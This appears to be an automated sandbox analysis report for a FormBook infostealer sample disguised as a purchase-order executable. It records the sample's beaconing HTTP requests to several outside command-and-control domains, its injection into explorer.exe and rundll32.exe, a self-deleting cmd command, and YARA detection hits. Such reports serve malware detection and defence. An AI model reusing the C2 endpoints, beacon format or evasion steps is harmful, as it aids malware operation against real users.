                                                                                          May 25, 2022 00:39:46.440790892 CEST1394OUTGET /j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfOvAU/+&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.expoj3.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:46.475223064 CEST1395INHTTP/1.1 301 Moved Permanently
                                                                                          Date: Tue, 24 May 2022 22:39:46 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Tue, 24 May 2022 23:39:46 GMT
                                                                                          Location: https://www.expoj3.com/j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfOvAU/+&THiL=OBZhFrvhwhfT
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 7109877b4e235b92-FRA
                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          22192.168.2.54981915.197.142.17380C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:39:51.504981041 CEST1395OUTGET /j86w/?r0DdqnX=Cda/DfRT+Myk92AVL8ZtInJusJj7ZXm0kCkpHstkNcvq7ssbimt58lhEnh+W6KwWQFgT&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.danilhodoekhi.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:51.556776047 CEST1396INHTTP/1.1 403 Forbidden
                                                                                          Server: awselb/2.0
                                                                                          Date: Tue, 24 May 2022 22:39:51 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 118
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          3192.168.2.549795165.231.150.7580C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:37:41.464118004 CEST1328OUTGET /j86w/?r0DdqnX=PAI2HRDsqfIs7wB2n/P/l/z8laWiiZHLAnESXFGBG/nSKD0096HYiOL/EcW4CPuu9Zhp&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.tsreaur.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:37:41.582911015 CEST1329INHTTP/1.1 404 Not Found
                                                                                          Server: Tengine
                                                                                          Date: Tue, 24 May 2022 22:42:25 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 684
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 74 73 72 65 61 75 72 2e 63 6f 6d 2f 6a 38 36 77 2f 3f 72 30 44 64 71 6e 58 3d 50 41 49 32 48 52 44 73 71 66 49 73 37 77 42 32 6e 2f 50 2f 6c 2f 7a 38 6c 61 57 69 69 5a 48 4c 41 6e 45 53 58 46 47 42 47 2f 6e 53 4b 44 30 30 39 36 48 59 69 4f 4c 2f 45 63 57 34 43 50 75 75 39 5a 68 70 26 61 6d 70 3b 54 48 69 4c 3d 4f 42 5a 68 46 72 76 68 77 68 66 54 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 61 74 6c 64 2d 67 68 2d 65 61 73 79 73 68 6f 70 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 32 2f 30 35 2f 32 35 20 30 36 3a 34 32 3a 32 35 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body bgcolor="white"><h1>404 Not Found</h1><p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.tsreaur.com/j86w/?r0DdqnX=PAI2HRDsqfIs7wB2n/P/l/z8laWiiZHLAnESXFGBG/nSKD0096HYiOL/EcW4CPuu9Zhp&amp;THiL=OBZhFrvhwhfT</td></tr><tr><td>Server:</td><td>atld-gh-easyshop</td></tr><tr><td>Date:</td><td>2022/05/25 06:42:25</td></tr></table><hr/>Powered by Tengine</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          4192.168.2.549796156.226.250.15080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:37:47.119066000 CEST1330OUTGET /j86w/?r0DdqnX=tkiTgEDY4Ttp5hV2NAZpvKTOl2tMD45nnNA9HzUYoopeMx94i1T5F8wdRmJN6yWBJNpO&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.iguaym.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:37:47.438154936 CEST1330INHTTP/1.1 404 Not Found
                                                                                          Date: Tue, 24 May 2022 22:37:47 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 260
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 69 67 75 61 79 6d 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.iguaym.com Port 80</address></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          5192.168.2.549797209.141.38.7180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:37:52.815294027 CEST1331OUTGET /j86w/?r0DdqnX=3X6DgWuJKzcNUM7EYaUA4aUsqI76cLlFBEHvGa5sqwhuxxVMpolaJYRqs0EV/jxQHXjU&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.funserve.club
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:37:53.008518934 CEST1332INHTTP/1.1 302 Moved Temporarily
                                                                                          Server: nginx
                                                                                          Date: Tue, 24 May 2022 22:37:52 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 154
                                                                                          Connection: close
                                                                                          Location: http://www.funserve.club?r0DdqnX=3X6DgWuJKzcNUM7EYaUA4aUsqI76cLlFBEHvGa5sqwhuxxVMpolaJYRqs0EV/jxQHXjU&THiL=OBZhFrvhwhfT
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          6192.168.2.549798198.54.117.21080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:37:58.239535093 CEST1333OUTGET /j86w/?r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.popcornpor.xyz
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          7192.168.2.549799104.16.100.5180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:38:03.488841057 CEST1334OUTGET /j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfOvAU/+&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.expoj3.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:38:03.523833036 CEST1334INHTTP/1.1 301 Moved Permanently
                                                                                          Date: Tue, 24 May 2022 22:38:03 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Tue, 24 May 2022 23:38:03 GMT
                                                                                          Location: https://www.expoj3.com/j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfOvAU/+&THiL=OBZhFrvhwhfT
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 710984f7de619bce-FRA
                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          8192.168.2.54980215.197.142.17380C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:38:08.761045933 CEST1342OUTGET /j86w/?r0DdqnX=Cda/DfRT+Myk92AVL8ZtInJusJj7ZXm0kCkpHstkNcvq7ssbimt58lhEnh+W6KwWQFgT&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.danilhodoekhi.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:38:08.813968897 CEST1348INHTTP/1.1 403 Forbidden
                                                                                          Server: awselb/2.0
                                                                                          Date: Tue, 24 May 2022 22:38:08 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 118
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          9192.168.2.54980334.102.136.18080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:38:13.906961918 CEST1349OUTGET /j86w/?r0DdqnX=YaH7gYIDTqY4cEQIM97hHwWq2XV+liDGv7Lmousy66vButcLOjPrknKPAsD+A1J6Q9LI&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.pieprop.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:38:14.031169891 CEST1350INHTTP/1.1 403 Forbidden
                                                                                          Server: openresty
                                                                                          Date: Tue, 24 May 2022 22:38:13 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 291
                                                                                          ETag: "628d16df-123"
                                                                                          Via: 1.1 google
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:00:35:44
                                                                                          Start date:25/05/2022
                                                                                          Path:C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"
                                                                                          Imagebase:0xeb0000
                                                                                          File size:544768 bytes
                                                                                          MD5 hash:86DD400E33EFA12EA4CBAC3D29000E41
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.465170567.000000000345C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.469891421.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:00:35:58
                                                                                          Start date:25/05/2022
                                                                                          Path:C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe
                                                                                          Imagebase:0x9e0000
                                                                                          File size:544768 bytes
                                                                                          MD5 hash:86DD400E33EFA12EA4CBAC3D29000E41
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:00:36:03
                                                                                          Start date:25/05/2022
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                          Imagebase:0x7ff74fc70000
                                                                                          File size:3933184 bytes
                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:high

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:00:36:36
                                                                                          Start date:25/05/2022
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Imagebase:0x2a0000
                                                                                          File size:61952 bytes
                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:high

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:00:36:41
                                                                                          Start date:25/05/2022
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:/c del "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"
                                                                                          Imagebase:0x1100000
                                                                                          File size:232960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Target ID:13
                                                                                          Start time:00:36:42
                                                                                          Start date:25/05/2022
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff77f440000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:11%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:132
                                                                                            Total number of Limit Nodes:8
